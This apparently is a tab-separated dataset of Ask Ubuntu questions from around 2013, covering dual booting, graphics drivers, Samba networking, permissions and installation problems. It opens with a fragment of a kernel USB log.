559.356038 ] timeout : still 3 active urbs on ep # 2 [ 560.356031 ] timeout : still 3 active urbs on ep # 2 [ 561.356036 ] timeout : still 3 active urbs on ep # 2 [ 563.360024 ] xhci_hcd 0000:08:00.0 : xhci host not responding to stop endpoint command . [ 563.360030 ] xhci_hcd 0000:08:00.0 : assuming host is dying , halting host . [ 563.360067 ] xhci_hcd 0000:08:00.0 : hc died ; cleaning up [ 563.360094 ] usb 5-1 : usb disconnect , device number 2 [ 563.360101 ] usb 5-1.1 : usb disconnect , device number 3 [ 566.356052 ] xhci_hcd 0000:08:00.0 : timeout while waiting for configure endpoint command [ 566.356059 ] xhci_hcd 0000:08:00.0 : abort the command ring , but the xhci is dead . [ 566.356066 ] usb 5-1.4.3 : not enough bandwidth for altsetting 0 [ 566.372698 ] usb 5-1.2 : usb disconnect , device number 4 [ 566.384510 ] usb 5-1.4 : usb disconnect , device number 5 [ 566.384520 ] usb 5-1.4.3 : usb disconnect , device number 6 [ 566.397554 ] usb 6-1 : usb disconnect , device number 2
350794	installing windows on a ubuntu system	okay , i have ubuntu 12.04 64 bit installed on a laptop . the hard drive is partitioned as follows : 80 gig ntfs flagged as /windows with nothing on it 80 gig ext4 flagged as /boot with ubuntu 12.04 64 bit installed 12 gig linux swap flagged as /swap ( this partition is encrypted ) everything else ( about 800 gig ) ntfs not flagged as soon as i figure out how to backup my ubuntu ( since i have what i need installed on it and working i 'm going to try to run deja dupe from a live cd ( it wo n't make a complete backup when i run it from the system ) ) i plan to use hirens boot disc v14 to backup the mbr just in case . so what do i need to do to get windows 8 or 7 installed on that first partition without messing up ubuntu too much ? mostly i just see instructions to install linux on a system that has windows on it ( probably because it is more friendly with the grub pointer on the mbr but i 'm just guessing on that . ) since i 'm doing this the other way around things are going to be different . please note that this is preemptive , i have not installed windows yet , it is more about what i need to do to protect ubuntu from getting wiped out or damaged when i do install windows . restoring my linux from a backup is something i want to avoid if possible . i 'm thinking that if i backup the mbr before installing windows and then restore it after installing windows then the grub and linux would be intact . i could then just boot to linux and from terminal update grub to include windows . booting to a live cd to restore grub after the fact may also be an option if needed , but i would like to avoid that as well .
350797	what about a distro dedicated to engineers ?	i am raihan ali . i am an civil engineering student . i am looking for a distro dedicated to engineers . i want a distro fully loaded with engineering tools . is there any distro like this ? thanks in advance : )
350798	font issues mozila firefox	i am getting missing fonts in firefox . is there anyway for getting the missing fonts ?
350804	missing installation steps	what i want to do is download ubuntu onto a 16gb usb stick and restart my win-8 computer to inititiate the reformatting and auto-install for ubuntu . it does n't seem to work . what steps am i missing ?
350807	hide topbar while using google chrome	how to hide top bar ( which includes buttons like clock , battery meter , etc ) on ubuntu 13.04 while using google chrome . same feature can be seen on sublime text 2 when we use full screen mode ( f11 ) and only tabs and page is visible ( basically hiding the top bar ) .
350809	graphicsmagick not listed in installed packages after install from source	i 've installed graphicsmagick following the instructions on the website , and ran the build verifications it says , and though i 'm not sure if those were to verify that install was successful or not , but at i guess at least having terminal to recognize the gm command means it was successfully installed , and besides i found a graphicsmagick directory in my /usr/local/include , again i do n't know if that proves anything . but when i list the installed packages with dpkg -l it 's not there . now , i need to install octave and i wonder if it will install graphicksmagick again , which is something i do n't want it to do if it ever would . besides i am now unable to remove it using apt-get remove . so how can i know what 's wrong with my installation and if installing octave will install its own version of gm ?
350811	non-dell battery not detected on dell inspiron 1545	i bought a new battery and power cord from amazon which is not dell oem . ubuntu is not recognizing the batter at all . it say 's `` not present '' . is it reasonable to assume that this is a hardware issue with the battery since it 's not oem or is there a software issue/patch/update for this ?
350813	how to re-install unity from ppa	i found some ppa that is patching unity . ( https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/789979 ) i want to re-install unity from this ppa . how can i do ? edit : the accepted answer below is to how to build your own version of unity.. please carefully read all comments .
350816	encryption my home folder and swap area errors	when i was installing ubuntu i both created `` encrypt my home folder '' and `` swap area '' . and now i get this error for each booting my computer . the error message is this : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery also , when i do n't encrypt my home folder , i do n't get an error like this . so i think , encryption is blocking swap area . and when i open system monitor and check what is the situation of ram and swap area , i see `` swap not available '' http : //i40.tinypic.com/25j8u9u.png i am running from a flash driver so even every megabyte is important for me . and i do n't want to waste my 1.5 gb for a crashed swap area . i also have important files for me and i have to do `` encryption '' can anyone tell me how can use encryption and swap area both , without taking any error ? thanks advance
350821	installing ubuntu-sdk requires cdrom . i have liveusb	while installing ubuntu-sdk , the following is the output . media change : please insert the disc labeled 'ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ' in the drive '/cdrom/ ' and press enter i do n't have the cd but i have a liveusb . how to mount the usb in the /cdrom ? or is there any other workaround ?
350822	if i only have the main repository enabled will it cause dependency problems with universe , restricted and multiverse ?	i have a questiong regarding installation of packages using software center . if i choose only main repository and istall a package could i get problems if the package has dependency to another package which is not in the main repository ?
350823	recovering a file after having formatted from ntfs to ext4	i used to have windows 7 but i 've recently formatted my hard drive to install kubuntu and i 've just realized that i forgot to backup a hidden .dat file which defines my bitcoin wallet . is it possible to recover this file ? how can i do this ? i need help .
350824	who | awk bash script	i am receiving the following error when attempting to run my script : ./watchuser : line 12 : syntax error near unexpected token `echo' ./watchuser : line 12 : `echo ( `` $ user online since : '' who| awk ' { print `` user : `` $ 1 '' - terminal : `` $ 2 '' - login @ `` $ 3 '' `` $ 4 } ' ) ' here is my script , it is supposed to show users that are online in epoch format . # ! /bin/bash for user in $ ( cd /home ; ls -- hide=lost+found ) do echo ( `` $ user online since : '' who| awk ' { print `` user : `` $ 1 '' - terminal : `` $ 2 '' - $ now= $ ( date + % s -d `` jan 1 , 1980 00:00:01 '' ) usr= $ ( who |awk ' { print $ 1 , `` : '' , $ 5 , $ 6 , $ 9 } ' | grep $ u ) usrdate= $ ( echo $ usr | cut -d `` : '' -f2 ) ( ( usrdate = $ ( date -- date `` $ usrdate '' + % s ) / 86400 ) ) ( ( now = now/86400 ) ) ( ( days = now - usrdate ) ) done
350827	how do i change xterm 's menu background color ?	my question is about xterm menu colors , but perhaps i 'm doing something else wrong so i 'm going to include the background steps that got me to this question . i 'm trying to get xterm to send escape by default when i hit the meta key . i can get this to work by adding a .xresources file : xterm*metasendsescape : true that works great , but by loading the .xresources file it changes my new xterm color schemes to black on white ; i want white on black . ok , i can fix this . i 'll just add some more config to my .xresources : xterm*background : black xterm*foreground : white xterm*metasendsescape : true this does set my xterm back to the color scheme i want . almost . the background and foreground are both black , but now the menus ( ctrl+left click ) have the same color scheme which makes it hard to see them . so i now want to change the menu colors independently of the normal background and foreground , but i ca n't figure out how to do that . i assume it is possible because if i remove the .xresources file that is default that i get . this is what my xterm looks like without a .xresources file ( this is what i 'm trying to replicate using .xresouces ) : this is what my xterm currently looks like with the above .xresources :
350828	how to install ubuntu touch on my galaxy s iii mini ?	i have a samsung galaxy s3 mini ( gt-i8190n ) , which is not listed here : ubuntu touch devices do you think i could go on and install one of these ? if yes , which one ?
350830	installing ubuntu on a windows xp drive	i am trying to install ubuntu from a cd and it always stops at ( initramfs ) regardless of what method i choose ? ( even if is only try ubuntu ) any help is appreciated . julio
350831	can not connect to internet using dial up software	i recently migrated to ubuntu from windows..i am currently in china.i installed the pppdial package from china telecom ... then through terminal i typed sudo dial..then i input my username and then i typed password but it shows '' pppoe server found : interface is up ? `` what should i do ? ? ?
350835	installation on an uefi system	i 've been using ubuntu for years . now i bought a new notebook and want to install ubuntu again but i ca n't . my notebook is a lenovo s300 ieadpad with preinstalled windows 8 . i want ubuntu to be my only os . here ( https : //help.ubuntu.com/community/uefi ) i read some instructions to how install ubuntu on a uefi system . so i downloaded ubuntu-13.04-desktop-amd64.iso and created a live usb . on the usb , there is now a virtualbox , is that right ? then i tried to follow the steps described on the named webpage . the problem is , i ca n't find neither quickboost nor the intel smart response technology in my bios . this is how my bios looks like : ubuntuone.com/1ur0p24clhyjaz7wgodekp ubuntuone.com/64mh9qz2ezidi9d7yku1ws ubuntuone.com/1wmnf0z02x1xqw1yht9zco ubuntuone.com/2ahuj4yyrq0qihebfffkda i tried to simply boot from usb but this did n't work . in this case , the lenovo logo appears and nothing happens . please , could you help me ? i really want to return to ubuntu . best regards ...
350838	apache default home - /home/ $ user/www	i know i can do this to set up a www directory from my home folder gksu gedit /etc/apache2/sites-enabled/000-default replace /var/www with /home/myusername/www sudo service apache2 restart but is there a way to use /home/ $ user/www ? i do n't want to use localhost/~myusername because it will mess up my code . basically i want to be able to login into different accounts on my laptop - one for work one personal - but have localhost default to the current logged in account . thanks , russ
350840	xubuntu set overscan to 0 for grub and boot screen	once booted the desktop is fine using the amd fglrx drivers since i can set the overscan to 0 using the catalyst control center . i do n't get the 1 inch border around the screen once booted . however i have never been able to get grub selection or the boot screen to fit the screen fully when using the propriety drivers . i have had this issue on 12.10 and now running 13.10 beta2 with the same issue . there must be an easy way to tell grub and the boot mode to over/under scan = 0 before the fglrx driver kicks in ?
350842	ubuntu 12.04 lts do not recognize wireless adapter	trying to connect a pc with ubuntu 12.04 lts ( kernel 3.8.0-29-generic ) with wireless adapter : `` wlan 300n usb 2.0 internet adapter '' but the wireless usb adapter is not recognized . it has a cd with drivers and for linux also but when i give the ./install.sh this error occurs : error : implicit declaration of function 'daemonize ' . the adapter seem to have no problem when i connected to a laptop with ubuntu 13.04 ( kernel 3.8.0-30-generic ) . any help will be appreciate . thanks in advance
350843	qbittorent is on my sidebar but wont download my films , but something called livid shows up	dont mind ubuntu but wish some things were made more simple . i download films and i was getting on fine with qbittorrent so easy , but now what has happened i dont know something called livid as got onto my computer and this wants to download my films , but its just rubbish to me as i have no idea what im doing.i want my qbittorrent back , i have even tried uninstalling and then installing it again and tho its there on side bar it wont work , but livid does . so would like to know how i get qbittorrent back to download my films and how does one uninstall things on ubuntu like this livid .
350845	how to embed a new window on gtk quickly glade	i 'm doing a program with quickly , but i 'm something new .. in same way , i learned well enough to program an application . but i need the structure in glade , i mean ... are only two main windows ... the first charge information , the second run some functions ... but i have trouble adding a second window because quickly only allows , add dialogs widget type ... i searched for information but it 's hard to find it and urges me a little . i could use tkinter but chooses quickly to develop ... . well i see two ways : 1 . create two windows in glade , but i do not know how to use both example super ( battleshipwindow , self ) . finish_initializing ( builder ) self.battleshipwindow2 = self.builder.get_object ( `` battleshipwindow2 '' ) # does not work make a new one , but it is difficult to integrate it can be used quickly add dialog battleshipwindow2 because it is a widget and not let modify please tell me i 'm doing right or wrong .. and if you can give me a hand thanks
350846	stuck at a grub2 screen on imac with ubuntu 13.04	i have installed ubuntu 13.04 on my old imac and today when loading it quite normally , i got prompted for the first time the grub menu asking me to choose which partition to boot . it normally does not happen , as i usually type my password to unlock the encrypted disk and then log in typing the password of my user . i was surprised to see that this `` grub menu '' does n't recognize any of my usb keyboard inputs . it does n't seem to come from the keyboard because i can boot from a cd by pressing alt + c after starting the computer , or eject a cd by holding f12 . just when i get prompted with this grub screen , i can not move up and down or get grub to know that i do want to start ubuntu ( pressing enter does n't seem to be `` detected '' by this grub menu ) . i tried to boot from a live cd and to run boot-repair . i already had a problem with grub when i installed ubuntu on my mac and using boot-repair fixed it nicely but not this time . here is the url that boot-repair gave me when it was done : http : //paste.ubuntu.com/6163316/ any help appreciated ...
350852	wwwdata user not working when permissions are 400-500 - 403 forbidden access	securing my server i found that using : find . -type f -exec chmod 400 { } \ ; find . -type d -exec chmod 500 { } \ ; display 403 forbidden access . if i use : find . -type f -exec chmod 644 { } \ ; find . -type d -exec chmod 755 { } \ ; the server displays but i can have access from the internet to some folders directories . my current folder owners are root - www-data for var/www/domain/public . i would like to perform 400-500 permissions with my website displaying results on the internet with current www-data user , or another option could be to block directory display of folders . any help appreciated .
350853	can not open mailbox /var/mail/user : permission denied no mail for user	when i run the command . su - fmaster mail i get the error : can not open mailbox /var/mail/fmaster : permission denied no mail for fmaster also i sign in as fmaster . terminal - > mail . /var/mail/fmaster : permission denied no mail for fmaster i tried to execute this code but i still get the same error.. sudo touch /var/mail/ $ user sudo chown $ user : mail /var/mail/ $ user sudo chmod o-r /var/mail/ $ user sudo chmod g+rw /var/mail/ $ user
350854	revert default folder ( images )	i accidently moved /home/user/desktop/images folder to desktop , and i thought that folder is just copy of original one so i deleted it , but it seems i moved it to desktop and now i do n't have images folder . i created new images folder manually but whenever i click on images shortcut in left sidebar i get error 'unable to find file ' and it points to folder i droped on desktop . how to revert path to folder and icon .
350855	deleted win7 partition of 263gb . how to get ubuntu 12.04 to utilize that space ?	win7 had a lot of problems so i finally got disgusted with it and deleted the entire partition . no i have 263 gb of unused hdd . how can i make ubuntu use it ? i do n't know how to extend ubuntus ' partition to include it !
350861	how to set a cron job to run a shell script ?	i had set a cron job : 20 * * * * /usr/bin/sh /home/lucky/myfile.sh the main problem is that at the schedule time , there is an error : '' mail have sent to /var/spool/mail/lucky '' . the contents of myfile.sh is : mkdir jh cd jh
350862	help with my netgear n150 wna1000m	i installed ubuntu 13.04 but my wireless card wo n't connect to the internet . a screen just pops up asking me verify my password . please help .
350863	ubuntu completely freezing a few minutes after system startup ( ati graphics )	i have ubuntu for about a week . i downloaded the ati graphics software from the ubuntu software store to get my dual monitor set-up working . i have been using it a few days since downloading the software ( with restarts ) it has started freezing after a few minutes of being fully started up . it is consistently the case . thank you .
350865	hyperdesktop alternative for ubuntu 13.04	i recently switched from windows 7 to ubuntu 13.04 . i found most software that i used on windows for ubuntu . which is why i 'm here.. there 's an application for windows called `` hyperdesktop '' . with this application you can take a picture of a selected area or the whole screen and it 'll automatically upload to imgur.com and replace your clipboard w/ the url of the image you 've just snapped . i use this application on a daily basis on windows and i was wondering is there any good alternatives ? i tried shutter and screencloud and both do something similar to what i 'd want but it 's not the same . it does n't necessarily have to upload to imgur either , any image hosting site or even ftp would be fine . thank you . edit : i forgot to add that you can use hotkeys . for example you can press ctrl4 at the same time and you can choose a selected area .
350866	will making a usb ubuntu boot disk wipe my usb stick ?	i 'm following this : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu and i know a lot of boot-disk creation stuff will wipe my usb -- -it 's 30gb which is more than i can comfortably back up to my hd right now , but i would like to install ubuntu on a friend 's machine . these instructions say : `` if youâre not yet sure about installing ubuntu , you can try it out without affecting your current system . '' so , that suggests there wo n't be any deleting , but i 'm hesitant to push the `` make startup disk '' button here : http : //assets.ubuntu.com/sites/ubuntu/580/u/img/download/create-usb-stick-on-ubuntu-4-12.10.png ... when there 's a button so nearby called `` erase disk '' so close by -- -i would never want erasing my disk to be an option if it were n't necessary . can someone confirm for me for sure whether this operation will delete my usb contents ?
350868	how do i find the interface of rhythmbox ?	i opened a mp3 , thus started rhythmbox and then minimized the ui . now i ca n't find a way to find the ui anymore , it 's not in the taskbar nor can i access it from alt-tab . what can i do ?
350870	automated backups + encryption	i have set up my ubuntu 12.04lts machine as a subversion server . i have a cloud-based backup system which routinely backs up files of mine ( crashplan ) to an online server , as well as to a backup nas on my local network . i am skeptical of the security any of these solutions really provides , so the bulk of my work is stored in a secure truecrypt partition with multiple independent keys . i back it up automatically , but it can not be backed up while in use , so i would have to endure some downtime during each backup , which is not acceptable in this case . i am looking for a way , in ubuntu , to have certain folders of mine backed up automatically as a single archived file ( ie : tar.bz2 , or similar ) , and heavily encrypted either via a passphrase , or a passphrase-protected private key , using at least aes256 . are there any straightforward , ui-based backup applications for ubuntu that are `` tried and true '' , and can schedule automatic , `` hot '' backups of folders to another location on my local machine , and automatically encrypt them ? the plan would be to add this backup destination to the list of folders my cloud backup system monitors . this way , the files themselves are already encrypted such that i possess the only key , in case the cloud backup company is compromised . i know i could write some cron jobs and shell scripts to accomplish this easily enough , but time does not permit right now to test the scripts extensively enough to guarantee that they are fail safe . thank you .
350874	mic stops working after awile	my headset giotech ex-05 stops working after 5 secs , ive used pulse audio and that still dont work please help me i cant do youtube video ; (
350875	what does âimagemagick [ security ] '' mean in the online package list ?	if i search for the package `` imagemagick '' in http : //packages.ubuntu.com/ it gives me the result and the word security written like this : [ security ] . does it mean it is in the main repository ? another result is that the package is also provided by graphicsmagick-imagemagick-compat which is in the universe repository . does this mean that the same package is provided twice ? would it also be possible that when a package is installed but the respective repository is disabled as the source the needed package would be installed from ather repository ?
350878	pc pentium 4 on an hp pavilion . any help ?	i have tied 3 different versions and they install but wo n't start ... . i get the log in screen then it starts having problems . i have a pc pentium 4 on an hp pavilion . any help ?
350880	can not install qtnx on ubuntu 13	a freenx server is running on the machine but i can not install qtnx root @ al2 : ~/downloads # sudo apt-get install qtnx reading package lists ... done building dependency tree reading state information ... done package qtnx is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'qtnx ' has no installation candidate root @ al2 : ~/downloads # any help appreciated . -- -- -- -- -- -- -- -- -- - edited i went with http : //nomachine.org . i could not have the quantal install work quickly . thanks .
350884	installing on usb	when using a pc with the hd in it and trying to install the ubuntu from a usb to another usb . the installation does not recognize the usb , and wants to install on the hd . and you can guess , i have messed up my hd not paying attention to this . is there anyway to proceed the way i am trying to do or i have to take the hd out of the pc so there wo n't be any accidents .
350890	wrong drivers in ubuntu 64-bit	i have dell optiplex 790 which comes with integrated intel速 hd graphics 2000 video card . i am using 64-bit ubuntu 13.04 . my computer runs slowly . trying to understand why i found that i have wrong drivers for my video card . lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cedar [ radeon hd 5000/6000/7350 series ] i am aware of this thread do i need additional graphics drivers win an intel hd graphics 2000 ? where people state that ubuntu comes with built-in drivers for my video card . should i reinstall the drivers ? if yes , how ? thank you .
350897	automate ubuntu install with wds	how to write grub to deploy ubuntu 12.04 desktop . i have a working wds with the ability to install windows images as well as centos\fedora\and gparted without fail . even has a nice grub with sub menus . i can not get ubuntu 12 or higher to boot . this is what i have in place right now . label ubuntu menu label ubuntu desktop 12.04.3 kernel /linux/ubuntu-12.04.3-desktop-i386/casper/vmlinuz append boot=casper netboot=nfs nfsroot=10.1.1.77 : /linux/ubuntu-12.04.3-desktop-i386/ initrd=/linux/ubuntu-12.04.3-desktop-i386/casper/initrd.lz quiet splash it will begin the process but then fail saying : ( initramfs ) unable to find a live file system on the network i can give more info if needed
350905	is there a way to advertise only 1 samba share across 2 home router subnets ?	i have a samba file share that i 'd like to make available to my airport extreme guest network on a different subnet . i 'm hoping for read-only access to keep my home network secure , but still allow the neighbors to connect for music , videos , and internet . the router has the option to add port settings with the following inputs : description public udp ports public tcp ports private ip address private udp ports private tcp ports i 've added both subnets to the /etc/samba/smb.conf global/networking section : interfaces = 127.0.0.0/8 eth0 , 10.0.1.0/24 hosts allow = 127.0.0.1 , 10.0.1.0/24 , 172.16.42.0/24 hosts deny = 0.0.0.0/0 my question is : how can i setup my ubuntu 12.04 server to connect to both networks from the same physical nic , to host a samba share from one to the other ? from my understanding it would be extremely difficult if possible . my router has port mapping options . maybe i could create 2 logical interfaces for the same hardware address and route all traffic by subnet . here are a few links that show what i 've found so far : http : //www.cyberciti.biz/tips/linux-how-to-setup-multi-homing-networking.html http : //manpages.ubuntu.com/manpages/trusty/en/man4/vlan.4freebsd.html some output from my ubuntu server : jeff @ bigjeff : / $ ifconfig eth0 link encap : ethernet hwaddr 6c:62:6d : e9 : cb : ac up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:21671 errors:0 dropped:0 overruns:0 frame:0 tx packets:21671 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4111775 ( 4.1 mb ) tx bytes:4111775 ( 4.1 mb ) virbr0 link encap : ethernet hwaddr de:52:4f:2a:40:9b inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr b8 : a3:86:08:53 : d6 inet addr:10.0.0.8 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : 2601:8:9300:710:20c1:52c3:8f99:3afe/64 scope : global inet6 addr : fe80 : :baa3:86ff : fe08:53d6/64 scope : link inet6 addr : 2601:8:9300:710 : baa3:86ff : fe08:53d6/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:17715061 errors:0 dropped:0 overruns:0 frame:0 tx packets:23989125 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4221319929 ( 4.2 gb ) tx bytes:30915022667 ( 30.9 gb ) jeff @ bigjeff : / $ sudo lshw -c network *-network description : wireless interface product : ar93xx wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : b8 : a3:86:08:53 : d6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-35-generic firmware=n/a ip=10.0.0.8 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : fbcc0000-fbcdffff memory : fbce0000-fbceffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 06 serial : 6c:62:6d : e9 : cb : ac size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:52 ioport : c800 ( size=256 ) memory : f8fff000-f8ffffff memory : f8ff8000-f8ffbfff jeff @ bigjeff : / $ ip route show default via 10.0.0.1 dev wlan0 proto static 10.0.0.0/24 dev wlan0 proto kernel scope link src 10.0.0.8 metric 2 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 similar posts with no answers : 1 network card/connection with 2 different ip settings sharing samba shares across subnets 2 vpn connections on the same time ( pptp , openvpn )
350908	why does my computer run slower on ubuntu than on windows ?	i recently installed ubuntu and am multi-booting with windows 7 , but i would like to switch over to linux full time . now i am seeing that it runs a lot slower ; i have a few examples : i 've tried playing euro truck simulator 2 and now i ca n't even run it when before it would run fine on max settings , also when i open up a web browser it takes forever to load up . i do have 8gb of ram and 3.6ghz cpu , so i do n't think that that is the problem . i 'm quite new to ubuntu so i could just be something stupid , but this is a problem .
350910	will changing the repository in the software center affect sources.list	i have all repositories activated ( main , universe , multiverse , restricted ) in the software center per default . if i make changes ( e.g . i would uncheck the box for multiverse ) i can not install the software from this repository anymore using software center . will it be possible to install the software from multiverse using `` apt-get '' ?
350913	how to format a pendrive ?	how to format a pendrive ? i am new on the os , so can anyone help with materials that can make things easier for me . i want to forever say goodbye to windows .
350917	12.04 on dell e6400 doesnt restart external displays when re-docked	i have a dell e6400 running 12.04 ( 64 ) . i run it with 2 external monitors on a docking station ( port replicator ) . i can undock the laptop ( for meetings , etc ) - but when i plug it back into the dock , even though it can detect my external displays fine , the screens just stay blank and i can only use the laptop screen . if i disable the laptop screen and click apply ( i had to try it ) - then i have 3 blank screens ( although a control-alt-f1 will open on one of the external monitors to allow a reboot . 01:00.0 vga compatible controller : nvidia corporation gf119m [ nvs 4200m ] ( rev a1 ) help ! cheers , ian
350918	ca n't enter my password in terminal	i need to install a package using terminal , i could type in the entire command for it , but when it asked for my password in the terminal , it would n't let me type anything ! what do i do ?
350919	running steam on ubuntu 12.04	upon opening steam states that i am running an older proprietary nvidia video drive . is there any way of fixing this issue ?
350920	error while installating ubuntu 12.04 via wubi	i was installing ubuntu alongside windows 8 . now i am having problem while installing ubuntu . it says a code error 2 , extraction problem with wubi 12.04.3-rev 279 ... .. need help !
350922	nvidia gtx 765m optimus tech on 12.04	i have tried a lot of different ways to get my pc working with graphics card but has n't got me anywhere . i started off with installing ubuntu 12.04 for the first time which left me stuck at black login screen . ( solved now ) . i have tried bumblebee method and installing driver from nvidia directly but both did n't work . ( iâve got removed nvidia* now since it did n't work with bumblebee i could not run optirun or prium ) lspci -nn | grep -i vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) sudo lshw -c display *-display unclaimed description : 3d controller product : gk106m [ geforce gtx 765m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) lspci | grep nvidia 01:00.0 3d controller : nvidia corporation gk106m [ geforce gtx 765m ] ( rev a1 )
350923	ubuntu wo n't load after installing new graphics card	recently , i built a computer and was deciding to run ubuntu because it 's free and works very well . just to start it off , i put some old 128mb video card in it and it booted fine . however , i realized i 'd just put my less old ( but still old ) graphics card in my computer . the one i put in is a geforce 210 ( until i get a 760 in a few months ) . once i put it in , it would show the bios screen , then it goes black and says `` monitor going to sleep '' . i tried holding down the shift button and even reinstalling ubuntu , but the shift button does n't do anything and reinstalling it does the same thing , everything ends up in a black screen . furthermore , i even tried putting the old graphics card in again , and that did n't work either . is there a way to get to the terminal and install something ? or make it run in safe mode ? i 'm pretty confused by this . ~matthew p.s . i think i have 12.4 , i just know it is n't 13.0+ . also , the graphics card does work on my old hp computer , so it should n't be the card . i even tried resetting the bios , but nothing really worked .
350924	dual booting - windows 8 and ubuntu 13.04	i have installed ubunto first then i installed win8 now when my computer get booted just win8 comes up and i cant get to ubuntu is there any way to do this without reinstalling ?
350925	software center . which repository ?	if i search for software using software center how can i find which repository the software comes from ? i tried desperately to find some information on the internet . i thought it is possible to right click on the program and see on the properties . but unfortunately it did not work .
350927	startup freeze , games crash , youtube crashes , no sound	i have installed ubuntu for the first time on my asus k55n , and it fails sometimes to boot up to the normal login screen , it usually just is purple and has dots , steam games crash as soon as i boot them , the sound icon on the top right has the speaker with -- - coming out of it , and no options when i click on it ... i 'm really confused , my bios is uefi , things like blender , or open ttd will refuse to open as well , could it just be that ubuntu doesnt recognize my graphics card ( s ) ? youtube youtube loads , and as soon as it plays , firefox completely crashes , firefox also crashes whenever i try and right click anything . i currently have flash , and the extras .
350928	ubuntu 12.10 to 13.04 upgrade crash	i was upgrading ubuntu to 13.04 from 12.10 when the software upgrade crashed . i restarted and it loaded 13.04 but the installation was half complete . i try sudo apt-get -f install and dpkg -a -- configure and bother are telling me there are too many errors . is there a way to recover this installation ?
350929	installing linux-generic-lts-quantal in 12.04.3 via preseed	i 'm struggling with getting this working . the problem is , the backported raring kernel breaks ovs . so we need the quantal kernel . i 've tried this in my preseed : d-i base-installer/kernel/override-image string linux-generic-lts-quantal but it does n't work since , according to debconf-get-selections -- installer , the only versions available are : $ debconf-get-selections -- installer | grep linux-image # choices : linux-signed-generic-lts-raring , linux-generic-lts-raring , linux-signed-image- generic-lts-raring , linux-image-generic-lts-raring , linux-signed-image-3.8.0-29- generic , linux-image-3.8.0-29-generic , none i do see this kernel still available in precise-security . i 've tried these stanza 's to try and pull in the upstream package # mirror settings d-i mirror/suite string precise d-i mirror/udeb/suite string precise-security d-i mirror/protocol string http d-i mirror/udeb/components multiselect main d-i mirror/http/directory string /ubuntu d-i apt-setup/services-select multiselect security d-i apt-setup/security_host string security.ubuntu.com d-i apt-setup/security_path string /ubuntu d-i mirror/http/proxy string but getting the same result . edit i 'd add that if i insert a proxy server into the equation , even the most minimal mirror config will pull in the correct kernel .
350930	how to change the default highlighting of gedit for a specific extension	everytime i open a .m file , gedit associates octave highlighting to it . i would like to change the default behavior to matlab . how can i , in general , change the default highlighting that gedit gives to a file associated to one extension to another language ?
